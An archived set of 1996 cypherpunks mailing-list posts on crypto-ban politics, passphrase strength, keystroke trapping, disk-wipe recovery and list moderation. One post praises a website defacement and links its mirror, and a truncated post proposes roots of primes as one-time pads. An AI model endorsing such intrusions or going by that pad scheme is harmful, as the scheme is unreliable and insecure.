From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Tue, 12 Nov 1996 20:49:45 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: So how does the crypto crackdown go?
In-Reply-To: <199611111718.JAA31638@crypt>
Message-ID: <Pine.SUN.3.95.961112234909.24058D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


As Hal knows, but some newer members of the list may not, I discuss the
possibility of a ban on strong (unescrowed) crypto at some, ahem, length
in

http://www.law.miami.edu/~froomkin/articles/clipper.htm

Although the article is more than 18 months old, the law hasn't changed
in any material way as far as I know.

Bottom line: they probably can't do it under the constitution, but it's a
closer call than it should be.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | Great weather here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 13 Nov 1996 00:47:55 -0800 (PST)
To: John Fricker <jfricker@vertexgroup.com>
Subject: Re: BizWeek speaks on Crypto
In-Reply-To: <19961112184849116.AAA174@dev.vertexgroup.com>
Message-ID: <v0310070aaeaf3b2bc72f@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>http://www.businessweek.com/1996/47/b350287.htm
>

I find a large dose of irony in the fact that this article hilights Royal Dutch/Shell, who last year told a European government committee that it's primary concern with encryption is:
	"protection of trade secrets from governments and competitors"


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 12 Nov 1996 15:56:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: So how does the crypto crackdown go?
Message-ID: <199611122355.AAA21086@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>One question is whether they would also try to make it illegal to use
>(rather than to distribute) crypto software.  On the one hand, if they
>don't do that, they have a problem with all the installed base of code.
>But the legalities of stopping people from encrypting code on their own
>computers, or writing crypto programs for personal use, seem a lot more
>questionable to me, and I don't know how much precedent there would be
>for that kind of restriction.

Not at all questionable. A ban on crypto would follow the current trend in regulating technology. 
Consider the case of Bernie S. who is in jail for possessing electronic parts that could be 
used for telco fraud. Any government action towards banning crypto will include possession
of crypto as a crime. 

The "cat's out of the bag" argument is ineffective as well as the governments just don't 
care. They'll just say in effect: "It's illegal. Destroy it if you got it." Now it's doubtful if 
enforcement would make unprovoked searches and arrest people solely for possession 
of crypto. And it is also unlikely that DA's (except perhaps the most bored) would follow 
up on "My neighbor is using crypto" tips. But it is not uncommon for prosecutors to 
heap additional charges on criminals (alleged) such as the case in robbery: 1 count 
robbery, 1 count using a gun in robbery. or perhaps 1 count tax evasion, 1 count using 
crypto to commit tax evasion. While the former charge may end up being unproven the 
later often sticks.

>
>So as I see it the main target of the ban would be distributors of
>software rather than end users.  This would be in line with the often
>stated goal of the law enforcement people that their main concern is with
>crypto that is built in, transparent, and trivial to use, rather than
>hacker's crypto.

Hmmm. Hackers built the ubiquitous CryptoFS for Linux, no? And the nascent S/WAN 
too. I don't see a distinction between popular and subculture crypto. The two invariably 
mix. A program may have it's origins in the subculture but it will often meet the needs of 
the popular culture as well and be adopted, accepted, and so on. Consider PGP and 
such add-ons as Brainless-PGP, WinPGP, and the various auto PGP tools.

It seems to me that banning distribution would just be too generous. What is distribution? 
Are time share accounts distribution? I created it but many can use it but the actual bits 
(well are there actual bits?) never left my single computer. But the nature of "distribution" 
is to move something from one person to another. Now nothing really moved but a few 
electrons. But multiple people did use it. Book 'em. Distribution is an archaic term here 
and the regulations will involve controlling what software may be run on personal computers.

The stated goal is a posture designed to sound reasonable. Only time will tell if the actual 
goal is the regulation of computer uses as I suspect.

The security establishment fears crypto. Fears loss of control. 

I suspect that with Clinton back in the White House (was there a choice?) we will enter 
a period where the Clipper chip seemed like a good idea. In comparison. Unless some 
fundamental changes occur to the Security, Intelligence and Law Enforcement agencies  
(a new acronym? SILE? Pronounced with a long E of course <g>) we will see more
business as usual and some completely draconian steps taken against strong encryption. 
The only recourse is to take an active role now. We must go on the offensive and :

1) Deploy S/WAN
2) Write more strong ubiquitous crypto
3) Attack the SILE agencies directly by challenging their purpose, gutting their budgets, 
exposing their falacies (umm is that almost freudian or what), flooding international 
communications with strong crypto messages (content need not apply), and of course 
ridiculing their every effort.
4) Finding allies in the legal community and educating fence sitters, critical judges, 
legislators, and so on.

Now is the time to act.

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eraser <security@myinternet.net>
Date: Tue, 12 Nov 1996 05:56:40 -0800 (PST)
To: firewalls@greatcircle.com
Subject: Kriegsman Furs Website hacked...
Message-ID: <199611121358.AAA13883@myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain



Hey all..

Another commercial hack.

http://www.kriegsman.com/ which is still live at this posting.

if it goes down, or is fixed, a mirror exists on
http://www.skeeve.net/kriegsman/

nicely done...

one for the furry creatures.

 -------------------------------------------------------------------
| Skeeve Stevens - MyInternet  personal.url: http://www.skeeve.net/ |
| email://skeeve@skeeve.net/   work.url: http://www.myinternet.net/ |
| phone://612.9869.3334/       mobile://0414.SKEEVE/      [753-383] |
 -------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Wed, 13 Nov 1996 01:06:37 -0800 (PST)
To: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Subject: Re: two bogus messages to this list
In-Reply-To: <9611121632.AA26619@notesgw2.sybase.com>
Message-ID: <Pine.3.89.9611130005.A13316-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/mixed


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.

---- next item ----
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII



More to the point, it is the use of constructs such as state machines to 
handle event processing that make it easy to compromise code - even 
without the magic of "hidden" DLL's or trap calls.

The Wintel PC is a virtual treasure trove of opportunity to 
compromise; starting with the BIOS, Boot sector, interrupt handlers and 
winding up with trojan horse applications and colorful file system viruses 
such as Windows. Unfortunately, UNIX on Intel is not immune to low level 
compromises either.

...Paul

On 12 Nov 1996, Ryan Russell/SYBASE wrote:

> All computers have software which capture keystrokes
> in a central way....we call them "keyboard drivers."
> 
> Any machine you have physical access to can 
> be compromised.
> 
>     Ryan
> 
> ---------- Previous Message ----------
> To: wombat
> cc: attila, cypherpunks, ichudov
> From: teddygee @ visi.net (Ted Garrett) @ smtp
> Date: 11/11/96 11:08:59 PM
> Subject: Re: two bogus messages to this list
> 
> 
> On Mon, 11 Nov 1996, Rabid Wombat wrote:
> >On Mon, 11 Nov 1996 attila@primenet.com wrote:
> >
> >> In <199611111238.GAA17346@manifold.algebra.com>, on 11/11/96 
> >>    at 06:38 AM, ichudov@algebra.com (Igor Chudov @ home) said:
> >> 
> >> >.I did not write the two messages below. I did have a small party
> >> >.yesterday, probably some of my guests did that...
> >>         just goes to proof it:  Microslop and Intel boxes are secure
> >>     only when most of their parts are stored under lock and key.
> >
> >Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
> >can be brought up in single-user mode and the root password changed by 
> >anyone with physical access to the system. You could end up with even 
> >more trouble than if someone messed with your M$ box.
> 
> Microsloth has, at the heart of it's system, a call which traps ALL
> KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
> placed inside of a DLL which most users would have no idea was loaded.
> Even under NT, this DLL can be made to remain resident and trapping
> Keystrokes, events, and window contents.
> 
> Does this just BEG to be exploited?
> 
> If you give me normal user access to ANY microsloth machine, I can
> have most of the system's security broken down to NOTHING within a
> week.  And I'm not even a good MS programmer!  <Are my prejudices
> showing?>
> 
> At least under UNIX, you damned well know you have to secure your
> system.  Microsloth attempts to sell itself as a secure platform.
> 
> ---
> "Obviously, the US Constitution isn't perfect, but
> it's a lot better than what we have now." - Unknown
> PGP key id - 0xDEACDFD1 - Full key available from
> pgp-public-keys@pgp.mit.edu
> 
> 
> 
> 
> 
> 
> 
> 
---- next item ----
Content-Type: TEXT/PLAIN; NAME=ATT01
Content-ID: <Pine.3.89.9611130005.A13316@netcom>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i

iQEVAwUBMof4ac1+l8EKBK5FAQHyHQf7BpV8GBB7EEazflFHoTjsUgBrayH9ibCb
IBYWUqiftuviG7TdKMg/Sj3eh69O9iMqah5lZR0bvpKZqFbeNgbMRGHnytjGvk5z
cmJUQaPgNYupZlLdg0bfbnaNyjJzUYTpNIuNX/fvwUwYQDKtXquTqcoMvWl0tFSI
N0PaiZEj5gsRbNCiJ15Uuzpwxn+FtYhwq92bWCWmSqLkpgn1FbC0PwzmKoEcrHpW
hYICm0LLS5Pp9y846SNEcANOP66/VfAL1pMsiBCL0tLxBa+K/UcB6xnutApQ4K0P
DeMkhqw3Z6fQVBAnJFGsrVJaXOvvtPdH1Lbwo1eIutbqyAaFU2FVGQ==
=dru/
-----END PGP SIGNATURE-----



---- next item ------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Nov 1996 22:16:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: NRC Crypto Report Supplement
Message-ID: <1.5.4.32.19961113061227.006a2900@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


As Herb Lin noted here last week, the final printed version
of the NRC Cryptography Report is available. It's a handsome
and bountiful volume; and belongs in all the world's libraries.

The main difference from the May 30 pre-publication version
is about 190 pages of reference documents, now provided
in a new Appendix N. The book claims all came from the Internet.

We've put 13 of the documents listed below on our site, and 
will finish the last 2 tomorrow. The Executive Orders, MOUs and 
MOAs may be of interest.

The contents are at:

     http://jya.com/nrcnidx.htm


Here's they are:

Appendix N  Laws, Documents, and Regulations, Relevant to Cryptography 


N.1    STATUTES 

N.1.1  Wire and Electronic Communications Interception and
       Interception of Oral Communications

N.1.2  Foreign Intelligence Surveillance 

N.1.3  Pen Register and Traffic Analysis 

N.1.4  Communications Assistance for Law Enforcement Act of 1995

N.1.5  Computer Security Act of 1987

N.1.6  Arms Export Control Act


N.2    EXECUTIVE ORDERS 

N.2.1  Executive Order 12333 (U.S. Intelligence Activities)

N.2.2  Executive Order 12958 (Classified National Security Information)
 
N.2.3  Executive Order 12472 (Assignment of National Security and 
       Emergency Preparedness Telecommunications Functions)

N.2.4  National Security Directive 42 (National Policy for the 
       Security of National Security Telecommunications and 
       Information Systems)


N.3    MEMORANDUMS OF UNDERSTANDING (MOU) AND AGREEMENT (MOA)

N.3.1  National Security Agency/National Institute of Standards
       and Technology MOU

N.3.2  National Security Agency/Federal Bureau of Investigation MOU

N.3.3  National Security Agency/
       Advanced Research Projects Agency/
       Defense Information Systems Agency MOA


N.4    REGULATIONS

N.4.1  International Traffic in Arms Regulations

N.4.2  Export Administration Regulations






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eraser <security@myinternet.net>
Date: Tue, 12 Nov 1996 06:12:33 -0800 (PST)
To: bgrosman@healey.com.au (Benjamin Grosman)
Subject: Re: ASIO encryption ?
In-Reply-To: <2.2.32.19961104002900.00926724@healey.com.au>
Message-ID: <199611121413.BAA13979@myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Dear All,
> 
> Does anyone happen to know what encryption methods, algorithms, or
> procedures ASIO (Australian Secret Intelligence Organisation) uses? Any
> information regarding ASIO's methods, cryptographic or otherwise, would be
> appreciated.
> 

Expect a visit idiot.

 -------------------------------------------------------------------
| Skeeve Stevens - MyInternet  personal.url: http://www.skeeve.net/ |
| email://skeeve@skeeve.net/   work.url: http://www.myinternet.net/ |
| phone://612.9869.3334/       mobile://0414.SKEEVE/      [753-383] |
 -------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 12 Nov 1996 23:01:14 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: A question about PGP Pass phrases.
In-Reply-To: <v03007802aea93092c562@[207.167.93.63]>
Message-ID: <199611130715.BAA00511@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. May said:
> years). However, a properly memorized passphrase, of sufficient length and
> entropy to make exhaustive search impractical, and proper "crypto hygiene"
> will go a long way toward making such raids ineffective.

     A very basic question then:

     What _would_ be a passphrase of sufficient length and entropy? 

     I would assume that the phrase "Off we go, into the while blue yonder"
would not be sufficient, but what about "0ff they went, in'ta the black viod"?

     I would guess that either would be difficult to out right guess, but the 
second would be considerably less likely. Not as unlikely as 
"KIB&^%(*h89hgv&*hjV6*ibHF&90n", but a hell of a lot easier to remember.

    It has been several months since I read the PGP users guide, and I don't 
remember any discussion of that in it, but I could be wrong. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 06:21:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007801aeade6d1ec11@[193.74.109.21]>
Message-ID: <199611121421.BAA16098@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 06:26:50 -0800 (PST)
To: firewalls@GreatCircle.COM
Subject: Returned mail: User Unknown
In-Reply-To: <199611121358.AAA13883@myinternet.net>
Message-ID: <199611121426.BAA16179@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 12 Nov 1996 18:12:25 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <199611121840.KAA04414@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.961113020845.1226A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, jim bell wrote:

> At 11:57 PM 11/11/96 -0500, Michael Froomkin - U.Miami School of Law wrote:
> >On Tue, 12 Nov 1996, Doug Renner wrote:
> >
> >> article nearly head-on.  However is it true that what you are saying is 
> >> that two fundamental premises in the article you refer to as "rabid" are 
> >> incorrect?  Namely:
> >> 
> >> "ARTICLE 1, SECTION 8 OF THE CONSTITUTION STATES THAT CONGRESS SHALL HAVE
> >> THE POWER TO COIN (CREATE) MONEY AND REGULATE THE VALUE THEREOF.
> >
> >The above is a true statement.  Note however that "congress" cannot
> >operate the mint.  It must -- **MUST** -- delegate this duty to the
> >executive branch (or someone outside the legislative branch, cf. Chadha
> >v. U.S.) if it wants it done. Congress is free to select the type
> >of agent it wants to do this.  Indeed, if Congress chose to license
> >private mints, that would, IMHO be legal.  The point here is that the
> >states don't have the power to coin money.
> 
> But, apparently, during the 1800's states (?) and individual banks did 
> indeed print their own currency.
> 
> The way I see it, a positive statement in the Constitution that the Feds 
> have the power to coin money does not necessarily exclude other 
> people/banks/states/foreign countries from doing likewise.
> 

Hrmm.. One might point out that the only thing required for someone to
"mint" (and I use this term loosely) money is for popular belief that the
money is worth something.  What do you think a cashier's check is?  Other
notable versions are (and I'm sure somebody is going to say "but its
represintative of the US Dollar", even though its all dealing with money
that really isn't there) is AmEx, MasterCard, Visa, etc.

> 
> Jim Bell
> jimbell@pacifier.com
> 

 --Deviant
        "Evil does seek to maintain power by suppressing the truth."
        "Or by misleading the innocent."
                -- Spock and McCoy, "And The Children Shall Lead",
                   stardate 5029.5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Wed, 13 Nov 1996 00:32:54 -0800 (PST)
Subject: RE: two bogus messages to this list
In-Reply-To: <01BBD081.63E4D3C0@blv-pm101-ip1.halcyon.com>
Message-ID: <Pine.NEB.3.94.961113033655.7155A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Mark M. Lacey wrote:

>> Even under NT, this DLL can be made to remain resident and trapping
>> Keystrokes, events, and window contents.
 
> This is (or was?) no problem under X Windows the last time I tried
> it (not recently), too.  In fact, you could monitor the keystrokes
> of any machine that you had access to remotely, as long as X was
> running.  All it took was a short little C program.  So what call
> is it on NT that you're talking about?

Only if the machines you are trapping from were silly enough to turn off
authentication.  This includes other users on the current machine trying
to trap from your display, BTW.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard L. Field" <field@pipeline.com>
Date: Wed, 13 Nov 1996 01:11:21 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
Message-ID: <1.5.4.16.19961113041232.2c0ff27e@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 AM 11/12/96 -0800, Jim Bell wrote:

>...The way I see it, a positive statement in the Constitution that the Feds 
>have the power to coin money does not necessarily exclude other 
>people/banks/states/foreign countries from doing likewise.


   No need to turn this into Constitutional Law 101, but you might wish to
look at Article I, Section 10.

   - Rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 09:32:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007800aeade37ef979@[207.167.93.63]>
Message-ID: <199611121732.EAA18904@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 09:37:34 -0800 (PST)
To: firewalls@GreatCircle.COM
Subject: Returned mail: User Unknown
In-Reply-To: <199611121358.AAA13883@myinternet.net>
Message-ID: <199611121737.EAA18936@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 09:41:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611121348.OAA12869@internal-mail.systemics.com>
Message-ID: <199611121741.EAA18994@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 09:53:25 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Returned mail: User Unknown
In-Reply-To: <2.2.32.19961112135622.0067bdf4@smtp1.abraxis.com>
Message-ID: <199611121753.EAA19155@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Wed, 13 Nov 1996 02:42:43 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Money-making ideas for Igor Chudov
In-Reply-To: <VBaBXD48w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961113053451.20903D-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Tue, 12 Nov 96 22:03:06 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> Reply-To: freedom-knights@jetcafe.org
> To: cypherpunks@toad.com
> Subject: Re: Money-making ideas for Igor Chudov
> 
> aga <aga@dhp.com> writes:
> > >
> > > "Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:
> >
> > algebra.com is a suspect domain.
> 
> Yes, Dr. Grubor - it's been implicated in Jan Isley's (spit) Usenet vote fraud:

I did not know about that.  I was speaking of another incident
when a user from that domain sent something to my pgh.org

(chop)

> > > (Alternatively, he can even e-mail 6 more issues of worthless advice to tho
> > > who caughed up the $20, so they can't complain. It would be hard to prosecu
> > > Igor without proving that all 8 newsletters were published by the same pers
> > > who's been giving contradictory advice to different people.)
> > >
> > But what Law would you charge him with?
> > Unless you could prove his "intent" I see no way that you
> > could ever prove any case against him.
> 
> The intent is to defraud, but shouldn't absolute free speech protect fraud
> and libel?
> 

Fraud always must have theft connected with it, so it is
a crime, but libel is never any crime, and is only civil.
Freedom of speech is no defense to any criminal charge,
but may be to a civil one.

-jg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 12 Nov 1996 22:20:19 -0800 (PST)
To: cypherpunks@toad.com>
Subject: Re: More snake oil: ENIGMA
In-Reply-To: <v02140b07aeaed1f1f746@[10.0.2.15]>
Message-ID: <199611130621.XAA11453@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v02140b07aeaed1f1f746@[10.0.2.15]>, on 11/12/96 
   at 05:20 PM, azur@netcom.com (Steve Schear) said:

-.  Attila said:
-.
-.>        I wonder if anyone told them the data recovery teams can pull
-.>    multiple layers of data off a disc after it has been stripped?

-.I've often wondered how effective disk encryption programs, like DiskCrypt,
-.are at hiding data from a Class III adversary (e.g., NSA).  These programs
-.offer a means of 'cleaning' the data and directory space using randomized
-.patterns applied one or more times, but this might be insufficient for
-.removing data written slightly off-track by a previous write cycle.
-.
        I don't have any direct experience with 'serious' error 
    recovery either; however, over a few years span listening to some
    my friends who have not come in from the cold,  I received the
    very definite reading the key is a differential measurement on flux
    and organization which expands the 'hearing' range exponentially
    -even if it is multiple destructive formatting.

        I written software programs for C2 and B1 clearance, including
    primitives which wiped as they went.  I used a pattern which 
    shifted and repeated itself --not too ridiculous on unix if you are
    using type 2 read/write primitives.  messy? yes, in its own simple
    way.

        The software was certified by multiple fairly sensitive regula- 
    tory agencies, plus the usual few for whom there is no name. you
    don't expect, and you do not receive, anything more than a yes/no.
    but it was in these circumstances I 'heard' the comments on recovery.

        and their ability to measure that differential gets better 
    every year!   No, I do not consider 'erased' disks safe from a
    determined federal agency.  I keep sensitive stuff on zip drives
    which are removable, and easily crippled forever.  that and our
    principal [a]vocation: stronger cryptography than the hardware can
    bruteforce or trick.

--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 13 Nov 1996 06:22:18 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611130641.WAA27702@netcom6.netcom.com>
Message-ID: <Pine.GSO.3.95.961113061359.725B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 12 Nov 1996, Bill Frantz wrote:
> There is a serious error here.  Gilmore did nothing to prevent Vulis from
> posting to the list.  He only prevented Vulis from receiving the list under
> his own name.  And, the as hominem attacks continue.

Yes, I understand this. It's quite obvious; being removed from the
subscriber list hasn't slowed Vulis at all. When I was writing the piece
Vulis seemed to have slowed his ad hominem attacks and instead was talking
about censorship (something that is within the charter of the list), but
perhaps the reprieve was only temporary. 

The point I was trying to make at the end and that I may not have done
very successfully is that it would be very difficult to prevent Vulis from
*posting* to the list under his name; he then could do it through
remailers. And blocking remailers is unacceptable. So how does one kick
someone else out of a forum where anonymous speech is allowed?

-Declan


> At  9:33 AM 11/12/96 -0800, Declan McCullagh wrote:
> >The Netly News
> >http://www.netlynews.com/
> >November 11, 1996
> >
> >Cypher-Censored
> >By Declan McCullagh (declan@well.com)
> >...
> >       That is, until recently, when Dimitri Vulis was given the boot.
> >   After he refused to stop posting flames, rants and uninspired personal
> >   attacks, Vulis was summarily removed from the mailing list.
> >   
> >...
> >   
> >       Thus began a debate over what the concept of censorship means in a
> >   forum devoted to opposing it. Did Gilmore have the right to show Vulis
> >   the virtual door? Or should he have let the ad hominem attacks
> >   continue, encouraging people to set their filters accordingly? The
> >   incident raises deeper questions about how a virtual community can
> >   prevent one person from ruining the forum for all and whether only
> >   government controls on expression can be called "censorship."
> 

> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
> (408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
> frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 05:02:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
Message-ID: <L8yBXD55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan's done an excellent journalistic job. I understand that because of the
space limitations he couldn't quote everything that everyone told him, so one
small point in his article might be misinterpreted by a casual reader:

Declan McCullagh <declan@well.com> writes:
>    though, he's almost notorious. His .sig file, for instance, proudly
Why "almost"? :-)
>    points out that he's a former Kook of the Month; Vulis was also a
There's no such thing as "former" KOTM, Declan. That's a lifetime achievement!
>    Net-legend and even has the alt.fan.dimitri-vulis newsgroup named
>    after him.
(I newgrouped a.f.d-v myself, actually. But it does get traffic :-)
>    daily messages that came from Vulis's keyboard. The list is on
>    Gilmore's machine and he can do what he wants with it; he can moderate
>    the postings, he can censor material, he can shut the whole thing
>    down. By kicking off an offending user, a list owner merely exercises
>    his property right. There's no government involvement, so the First
>    Amendment doesn't apply.

I told Declan that agree 100% - John Gilmore has the right to do anything
he likes with his private mailing list. The 1st Amendment does not apply.

However censorship needn't be government-imposed.

>        For his part, Gilmore calls removing the Russian mathematician "an
>    act of leadership." He says: "It said we've all been putting up with

An act of censorship, an act of cowardice, an act of Hitler-like leadership...

>    this guy and it's time to stop. You're not welcome here... It seemed
>    to me that a lot of the posts on cypherpunks were missing the mark.
>    They seemed to have an idea that their ability to speak through my
>    machine was guaranteed by the Constitution."

If John Gilmore ascribes this opinion to me, then he's lying outright.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 12:58:34 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Returned mail: User Unknown
In-Reply-To: <2.2.32.19961112155353.00686588@smtp1.abraxis.com>
Message-ID: <199611122057.HAA21521@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ron Strasburg <rstrasbu@bronco1.hastings.edu>
Date: Wed, 13 Nov 1996 06:03:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A really short one time pad.
In-Reply-To: <v03007801aeaef123f2eb@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.961113075918.7895A-100000@bronco1.hastings.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Nov 1996, Timothy C. May wrote:

> At 5:39 PM -0800 11/12/96, Sean Roach wrote:
> >Actually, here are ten.
> >2^.5
> >3^.5
> >2^(1/3)
> >5^.5
> >5^(1/3)
> >7^.5
> >11^.5
> >13^.5
> >17^.5
> >Pi
> >For that patter the nth root of any prime number.
> >A lifetime of "pads" could be distributed in one trip.  Of course this still
